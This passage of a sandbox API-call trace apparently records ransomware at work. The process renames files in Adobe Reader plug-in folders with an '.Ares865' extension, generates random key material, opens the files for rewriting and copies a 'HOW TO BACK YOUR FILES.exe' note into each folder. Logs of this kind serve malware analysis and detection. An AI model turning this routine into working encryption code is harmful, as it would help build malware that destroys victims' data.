BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_sky\\how to back your files.exe"), bFailIfExists=1) returned 0 [0172.739] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0172.740] GetLastError () returned 0x0 [0172.740] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0172.740] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d807c60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x548d51a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x548d51a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0172.740] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0172.740] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0172.741] lstrcpyW (in: lpString1=0x2cce498, lpString2="Flash.SKY" | out: lpString1="Flash.SKY") returned="Flash.SKY" [0172.741] lstrlenW (lpString="Flash.SKY") returned 9 [0172.741] lstrlenW (lpString="Ares865") returned 7 [0172.741] lstrcmpiW (lpString1="ash.SKY", lpString2="Ares865") returned 1 [0172.741] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY\\Flash.SKY.Ares865") returned 93 [0172.741] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY\\Flash.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_sky\\flash.sky"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY\\Flash.SKY.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_sky\\flash.sky.ares865"), dwFlags=0x1) returned 1 [0172.742] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY\\Flash.SKY.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_sky\\flash.sky.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.742] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0172.743] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.743] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.743] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.747] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.747] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.747] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.748] lstrcpyW (in: lpString1=0x2cce498, lpString2="Mcimpp.SKY" | out: lpString1="Mcimpp.SKY") returned="Mcimpp.SKY" [0172.748] lstrlenW (lpString="Mcimpp.SKY") returned 10 [0172.748] lstrlenW (lpString="Ares865") returned 7 [0172.748] lstrcmpiW (lpString1="mpp.SKY", lpString2="Ares865") returned 1 [0172.748] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY\\Mcimpp.SKY.Ares865") returned 94 [0172.748] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY\\Mcimpp.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_sky\\mcimpp.sky"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY\\Mcimpp.SKY.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_sky\\mcimpp.sky.ares865"), dwFlags=0x1) returned 1 [0172.750] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY\\Mcimpp.SKY.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_sky\\mcimpp.sky.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.750] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8192) returned 1 [0172.750] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.751] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.751] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.758] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.758] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.758] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.759] lstrcpyW (in: lpString1=0x2cce498, lpString2="QuickTime.SKY" | out: lpString1="QuickTime.SKY") returned="QuickTime.SKY" [0172.759] lstrlenW (lpString="QuickTime.SKY") returned 13 [0172.759] lstrlenW (lpString="Ares865") returned 7 [0172.759] lstrcmpiW (lpString1="ime.SKY", lpString2="Ares865") returned 1 [0172.759] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY\\QuickTime.SKY.Ares865") returned 97 [0172.759] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY\\QuickTime.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_sky\\quicktime.sky"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY\\QuickTime.SKY.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_sky\\quicktime.sky.ares865"), dwFlags=0x1) returned 1 [0172.761] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY\\QuickTime.SKY.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_sky\\quicktime.sky.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.761] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0172.761] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.762] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.762] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.766] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.767] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.767] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.768] lstrcpyW (in: lpString1=0x2cce498, lpString2="WindowsMedia.SKY" | out: lpString1="WindowsMedia.SKY") returned="WindowsMedia.SKY" [0172.768] lstrlenW (lpString="WindowsMedia.SKY") returned 16 [0172.768] lstrlenW (lpString="Ares865") returned 7 [0172.768] lstrcmpiW (lpString1="dia.SKY", lpString2="Ares865") returned 1 [0172.768] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY\\WindowsMedia.SKY.Ares865") returned 100 [0172.768] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY\\WindowsMedia.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_sky\\windowsmedia.sky"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY\\WindowsMedia.SKY.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_sky\\windowsmedia.sky.ares865"), dwFlags=0x1) returned 1 [0172.770] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY\\WindowsMedia.SKY.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_sky\\windowsmedia.sky.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.770] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0172.770] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.771] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.771] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.774] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.775] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.775] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.777] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS" [0172.777] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS" [0172.777] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0172.777] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rus\\how to back your files.exe"), bFailIfExists=1) returned 0 [0172.778] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0172.779] GetLastError () returned 0x0 [0172.779] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0172.779] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d807c60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x548fb300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x548fb300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0172.779] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0172.779] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0172.779] lstrcpyW (in: lpString1=0x2cce498, lpString2="Flash.RUS" | out: lpString1="Flash.RUS") returned="Flash.RUS" [0172.779] lstrlenW (lpString="Flash.RUS") returned 9 [0172.780] lstrlenW (lpString="Ares865") returned 7 [0172.780] lstrcmpiW (lpString1="ash.RUS", lpString2="Ares865") returned 1 [0172.780] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS\\Flash.RUS.Ares865") returned 93 [0172.780] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS\\Flash.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rus\\flash.rus"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS\\Flash.RUS.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rus\\flash.rus.ares865"), dwFlags=0x1) returned 1 [0172.782] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS\\Flash.RUS.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rus\\flash.rus.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.782] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0172.782] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.783] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.783] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.792] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.792] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.792] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.793] lstrcpyW (in: lpString1=0x2cce498, lpString2="MCIMPP.RUS" | out: lpString1="MCIMPP.RUS") returned="MCIMPP.RUS" [0172.793] lstrlenW (lpString="MCIMPP.RUS") returned 10 [0172.793] lstrlenW (lpString="Ares865") returned 7 [0172.793] lstrcmpiW (lpString1="MPP.RUS", lpString2="Ares865") returned 1 [0172.794] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS\\MCIMPP.RUS.Ares865") returned 94 [0172.794] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS\\MCIMPP.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rus\\mcimpp.rus"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS\\MCIMPP.RUS.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rus\\mcimpp.rus.ares865"), dwFlags=0x1) returned 1 [0172.796] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS\\MCIMPP.RUS.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rus\\mcimpp.rus.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.796] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8192) returned 1 [0172.796] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.797] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.797] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.802] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.803] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.803] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.804] lstrcpyW (in: lpString1=0x2cce498, lpString2="QuickTime.RUS" | out: lpString1="QuickTime.RUS") returned="QuickTime.RUS" [0172.804] lstrlenW (lpString="QuickTime.RUS") returned 13 [0172.804] lstrlenW (lpString="Ares865") returned 7 [0172.804] lstrcmpiW (lpString1="ime.RUS", lpString2="Ares865") returned 1 [0172.804] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS\\QuickTime.RUS.Ares865") returned 97 [0172.804] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS\\QuickTime.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rus\\quicktime.rus"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS\\QuickTime.RUS.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rus\\quicktime.rus.ares865"), dwFlags=0x1) returned 1 [0172.806] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS\\QuickTime.RUS.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rus\\quicktime.rus.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.806] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0172.806] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.807] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.807] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.813] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.814] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.814] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.814] lstrcpyW (in: lpString1=0x2cce498, lpString2="WindowsMedia.RUS" | out: lpString1="WindowsMedia.RUS") returned="WindowsMedia.RUS" [0172.814] lstrlenW (lpString="WindowsMedia.RUS") returned 16 [0172.814] lstrlenW (lpString="Ares865") returned 7 [0172.814] lstrcmpiW (lpString1="dia.RUS", lpString2="Ares865") returned 1 [0172.815] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS\\WindowsMedia.RUS.Ares865") returned 100 [0172.815] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS\\WindowsMedia.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rus\\windowsmedia.rus"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS\\WindowsMedia.RUS.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rus\\windowsmedia.rus.ares865"), dwFlags=0x1) returned 1 [0172.816] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS\\WindowsMedia.RUS.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rus\\windowsmedia.rus.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.816] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0172.817] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.817] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.817] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.820] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.822] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.822] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.823] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM" [0172.823] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM" [0172.823] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0172.823] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rum\\how to back your files.exe"), bFailIfExists=1) returned 0 [0172.824] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0172.825] GetLastError () returned 0x0 [0172.825] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0172.825] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d807c60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x548fb300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x548fb300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0172.825] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0172.825] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0172.825] lstrcpyW (in: lpString1=0x2cce498, lpString2="Flash.RUM" | out: lpString1="Flash.RUM") returned="Flash.RUM" [0172.825] lstrlenW (lpString="Flash.RUM") returned 9 [0172.825] lstrlenW (lpString="Ares865") returned 7 [0172.825] lstrcmpiW (lpString1="ash.RUM", lpString2="Ares865") returned 1 [0172.826] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 